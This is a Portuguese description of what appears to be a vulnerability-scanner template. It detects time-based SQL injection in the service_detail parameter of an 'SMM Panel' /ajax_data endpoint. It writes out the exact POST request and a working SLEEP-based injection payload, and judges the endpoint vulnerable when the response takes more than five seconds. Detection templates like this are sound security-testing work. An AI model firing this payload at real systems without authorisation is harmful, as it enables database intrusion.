
Modelo de detecção de injeção SQL baseada em tempo para SMM Panel. Envia requisições POST personalizadas para `/ajax_data` e identifica endpoints vulneráveis por meio da análise de atraso na resposta.
Detecção de SQL Injection baseada em tempo para SMM Panel
Este template detecta uma vulnerabilidade de SQL Injection baseada em tempo no parâmetro service_detail do SMM Panel através de requisições HTTP POST para /ajax_data. A exploração pode permitir que atacantes remotos acessem dados sensíveis ou escalem privilégios.
A ferramenta envia uma requisição POST personalizada:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Se o tempo de resposta for maior que 5 segundos, indica um endpoint vulnerável.
- Método: POST
- Caminho: {{BaseURL}}/ajax_data
- Cabeçalhos: Content-Type: application/x-www-form-urlencoded
- Corpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duração > 5 segundos
